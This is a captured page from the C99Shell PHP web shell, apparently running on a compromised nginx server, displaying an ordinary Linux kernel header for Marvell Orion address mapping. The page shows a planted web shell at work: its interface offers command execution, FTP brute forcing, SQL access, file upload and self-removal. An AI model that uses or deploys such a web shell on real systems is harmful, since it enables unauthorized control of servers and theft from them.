!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/src/linux-oracle-headers-5.15.0-1040/arch/arm/plat-orion/include/plat/   drwxr-xr-x
Free 83.35 GB of 96.73 GB (86.18%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     addr-map.h (1.53 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/*
 * arch/arm/plat-orion/include/plat/addr-map.h
 *
 * Marvell Orion SoC address map handling.
 *
 * This file is licensed under the terms of the GNU General Public
 * License version 2.  This program is licensed "as is" without any
 * warranty of any kind, whether express or implied.
 */

#ifndef __PLAT_ADDR_MAP_H
#define __PLAT_ADDR_MAP_H

extern struct mbus_dram_target_info orion_mbus_dram_info;

struct orion_addr_map_cfg {
    const int num_wins;    /* Total number of windows */
    const int remappable_wins;
    void __iomem *bridge_virt_base;
    int hw_io_coherency;

    /* If NULL, the default cpu_win_can_remap will be used, using
       the value in remappable_wins */
    int (*cpu_win_can_remap) (const struct orion_addr_map_cfg *cfg,
                  const int win);
    /* If NULL, the default win_cfg_base will be used, using the
       value in bridge_virt_base */
    void __iomem *(*win_cfg_base) (const struct orion_addr_map_cfg *cfg,
                 const int win);
};

/*
 * Information needed to setup one address mapping.
 */
struct orion_addr_map_info {
    const int win;
    const u32 base;
    const u32 size;
    const u8 target;
    const u8 attr;
    const int remap;
};

void __init orion_config_wins(struct orion_addr_map_cfg *cfg,
                  const struct orion_addr_map_info *info);

void __init orion_setup_cpu_win(const struct orion_addr_map_cfg *cfg,
                const int win, const u32 base,
                const u32 size, const u8 target,
                const u8 attr, const int remap);

void __init orion_setup_cpu_mbus_target(const struct orion_addr_map_cfg *cfg,
                    const void __iomem *ddr_window_cpu_base);
#endif

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0062 ]--